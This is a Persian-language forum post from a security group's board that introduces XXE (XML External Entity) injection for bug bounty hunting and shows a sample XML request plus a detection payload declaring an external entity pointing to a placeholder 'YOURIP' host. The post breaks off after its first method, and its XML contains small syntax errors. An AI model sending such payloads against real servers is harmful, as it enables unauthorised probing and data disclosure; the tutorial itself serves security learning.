آسیب پذیری Xxe در باگ بانتی (bug Bounty) - باگ بانتی (bug Bounty) - انجمن گروه امنیتی امپراطور رفتن به مطلب

Emperor Cyber Security


گروه امنیتی امپراطور
با بیش از 15سال سابقه در ضمینه طراحی و امنیت سایت و سرور با نام درخشان گروه امنیتی امپراطور
با بهترین کیفیت و بالاترین سطح امنیت
بیشتر بدانید
News Ticker
  • News ticker sample
  • News ticker sample

بایگانی شده

این موضوع بایگانی و قفل شده و دیگر امکان ارسال پاسخ نیست.

MR.F@RDIN

آسیب پذیری Xxe در باگ بانتی (bug Bounty)

پست های پیشنهاد شده

درود
 

آسیب پذیری Xxe در باگ بانتی (bug Bounty)


در آسیب پذیری XXE ویا XML External Entity Injection به حمله ای اطلاق می شود که ورودی XML را در وهله اول تجزیه شود . این حمله زمانی رخ می دهد که ورودی XML حاوی وجود یک حمله خارجی توسط یک تجزیه کننده XML صورت بگیرد که بدلیل پیکربندی نامناسب داخل سرور پردازش شود. بنابراین حمله منجر به نشراطلاعات محرمانه ، حملات تکذیب سرویس ، جعل درخواست سمت سرور ، اسکن پورت و ضربات حملاتی که بعد از نیز ممکن است به همراه داشته باشد .

فرض می کنیم ما یک آسیب پذیری XXE پیدا کرده ایم که محتوای زیر را در درخواست POST به برنامه ارسال می کند:
 

کد:
<?xml version=”1.0 encoding=”ISO-8859-1″?>

<Prod>

<Prod>

<Type>test</type>

<name>iran-cyber</name>

<id>21</id>

</Prod>

</Prod>

 



بررسی حمله که ببینید آسیب پذیر است یا خیر :


روش 1 - شناسایی سرور آسیب پذیر با استفاده از نهاد SYSTEM:

اولین قدم ببینیم آیا میتوانیم درخواستی را با ارسال یک فایل لوکال روی سرور تارگت انجام بدیم یا نه ؟! برای اینکار، با استفاده از SYSTEM استفاده می کنیم:
 

کد:
<?xml version=”1.0 encoding=”ISO-8859-1″?>

<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM “http://YOURIP/TEST.ext” >]>

<Prod>

<Prod>

<Type>test</type>

<name>iran-cyber</name>

<id>&xxe</id>

</Prod>

</Prod>

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

  • کاربران آنلاین در این صفحه   0 کاربر

    هیچ کاربر عضوی،در حال مشاهده این صفحه نیست.

×
×
  • اضافه کردن...